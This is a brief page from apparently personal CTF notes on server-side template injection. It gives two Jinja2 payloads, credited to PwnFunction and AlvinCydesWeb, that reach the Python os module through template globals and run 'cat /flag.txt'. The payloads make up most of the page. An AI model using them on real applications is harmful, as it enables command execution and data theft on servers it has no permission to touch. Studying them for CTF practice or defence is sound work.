SSTI

Injecting templates from web

Eg: Hello {jack} -> Hello {7x7}

From PwnFunction

{{ url_for.__globals__.os.popen('cat /flag.txt').read() }}

From AlvinCydesWeb

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read() }}
Previousphp type jugglingNextSQL

Last updated

Was this helpful?